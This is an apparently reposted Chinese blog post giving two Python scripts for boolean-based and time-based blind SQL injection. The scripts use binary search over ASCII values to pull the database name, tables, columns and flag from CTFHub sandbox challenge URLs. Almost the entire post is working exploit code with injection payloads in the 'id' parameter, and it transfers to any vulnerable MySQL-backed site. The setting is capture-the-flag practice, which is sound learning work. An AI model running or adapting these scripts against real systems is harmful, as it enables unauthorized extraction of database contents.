zoukankan      html  css  js  c++  java

  • sql布尔盲注和时间盲注的二分脚本

    布尔盲注:

    import requests

url = "http://challenge-f0b629835417963e.sandbox.ctfhub.com:10080/"

def inject_database(url):
	name = ''

	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select database()),%d,1))>%d,1,0)"%(i,mid)
			params = {'id':payload}
			r = requests.get(url,params = params)
			if "query_success" in r.text:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

def inject_table(url):
	name = ''

	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'sqli'),%d,1))>%d,1,0)"%(i,mid)
			params = {'id':payload}
			r = requests.get(url,params = params)
			if "query_success" in r.text:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

def inject_column(url):
	name = ''

	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'flag'),%d,1))>%d,1,0)"%(i,mid)
			params = {'id':payload}
			r = requests.get(url,params = params)
			if "query_success" in r.text:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

def flag(url):
	name = ''

	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select flag from flag),%d,1))>%d,1,0)"%(i,mid)
			params = {'id':payload}
			r = requests.get(url,params = params)
			if "query_success" in r.text:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

# inject_database(url)
# inject_table(url)
# inject_column(url)
flag(url)

    时间盲注:

    import requests
import time

#   time.time()

url = "http://challenge-a869b4d983fcacff.sandbox.ctfhub.com:10080/"

def inject_database(url):
	name = ''

	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select database()),%d,1))>%d,sleep(1),0)"%(i,mid)
			params = {'id':payload}
			start_time = time.time()	#	注入前的系统时间
			r = requests.get(url,params = params)
			end_time = time.time()		# 	注入后的时间
			if end_time - start_time > 1:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

def inject_table(url):
	name = ''

	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select table_name from information_schema.tables where table_schema='sqli'),%d,1))>%d,sleep(1),0)"%(i,mid)
			params = {'id':payload}
			start_time = time.time()	#	注入前的系统时间
			r = requests.get(url,params = params)
			end_time = time.time()		# 	注入后的时间
			if end_time - start_time > 1:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

def inject_column(url):
	name = ''
	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),%d,1))>%d,sleep(1),0)"%(i,mid)
			params = {'id':payload}
			start_time = time.time()	#	注入前的系统时间
			r = requests.get(url,params = params)
			end_time = time.time()		# 	注入后的时间
			if end_time - start_time > 1:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

def flag(url):
	name = ''
	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select flag from flag),%d,1))>%d,sleep(1),0)"%(i,mid)
			params = {'id':payload}
			start_time = time.time()	#	注入前的系统时间
			r = requests.get(url,params = params)
			end_time = time.time()		# 	注入后的时间
			if end_time - start_time > 1:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

# inject_database(url)
# inject_table(url)
# inject_column(url)
flag(url)
  • 相关阅读:
    JS字符串函数String.replace()[转]
    分辨率和比例尺[转]
    DateDiff 函数的用法 SQL时间比较
    ASP.NET 2.0 本地化2
    ASP.NET 2.0 本地化1
    简单的分页过程,确在第10,20,30....等页,不能显示,请求帮忙,谢谢
    JQuery打造的分页无刷新的Repeater
    让flash置于DIV层之下的方法,让flash不挡住飘浮层或下拉菜单
    VS2005 + VSS6.0 简单应用示例
    SQLServer查询最近一天,三天,一周,一月,一季度方法
  • 原文地址:https://www.cnblogs.com/lemon629/p/13870659.html
Copyright © 2011-2022 走看看